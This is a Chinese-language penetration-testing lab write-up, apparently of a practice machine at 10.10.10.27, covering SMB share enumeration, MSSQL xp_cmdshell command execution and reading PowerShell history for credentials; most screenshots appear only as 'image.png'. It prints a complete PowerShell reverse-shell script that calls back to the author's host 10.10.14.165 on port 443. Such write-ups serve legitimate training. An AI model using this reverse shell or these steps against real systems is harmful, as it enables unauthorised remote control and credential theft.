0x00 信息搜集

nmap扫一下端口看看开了什么端口

image.png

发现是个windows的机器，然后看到445端口开着，这个是一个让我们可以在局域网中轻松访问各种共享文件夹或共享打印机的端口，使用的是SMB协议。

0x01 开始渗透

那用smb来看看共享的内容有什么好了，kali自带了一个smbclient工具哦：
smbclient -N -L //10.10.10.27/(图中那个斜杠是当时试的，没有查具体格式，懒得改了)

image.png

image.png

image.png

image.png

判断是否拥有sysadmin权限，用这句SELECT IS_SRVROLEMEMBER('sysadmin')

image.png

image.png

image.png

看看桌面有什么内容:EXEC xp_cmdshell 'dir ..\..\users\sql_svc\Desktop'

image.png

image.png

image.png

0x02 获取操作系统普通用户权限(nc监听不到，废了)

这个是因为我们需要一个直接的操作系统shell来进行后续的操作，所以要建立一个powershell的反向shell文件shell.ps1（注意其中的ip地址为接收shell的kali主机的地址,我的ip是10.10.14.165），代码如下：

$rev_ip = "10.10.14.165"

$client = New-Object System.Net.Sockets.TCPClient($rev_ip,443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
    }
$client.Close()

接下来要用python搭建一个http服务器，监听80端口来供靶机下载shell.ps1文件,我这边kali的python版本是2.7，所以命令是sudo python -m SimpleHTTPServer 80,python3的话应该是这句python -m http.server 80

image.png

在kali中启动netcat监听443端口，等待靶机反向shell连接（端口号需要与shell.ps1中相对应）：

image.png

由于nc一直没有反应所以，我的这一步并没有成功进行下去，到那时我觉得毫不影响后续提权操作。

0x03 直接提权

拿到user的flag之后尝试一下检查历史命令：
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
看一下回显结果

image.png

image.png

0x04 补充内容

smbclient的命令

-N：匿名登录
-L：获取共享资源列表

windows下的命令

get：下载文件到本地机器。
type：用来显示ascii码文件的内容，尤其可以用来在屏幕上快速、简便地显示TXT文本文件的内容。

安装impacket

推荐参考这篇文章如何在kali下安装impacket

如果脚本运行有问题

检查一下自己的ip有没有写对，\与/要分清楚，python3下和python2下命令是不一样的，而且脚本运行环境也不一样，推荐python环境2，3共存。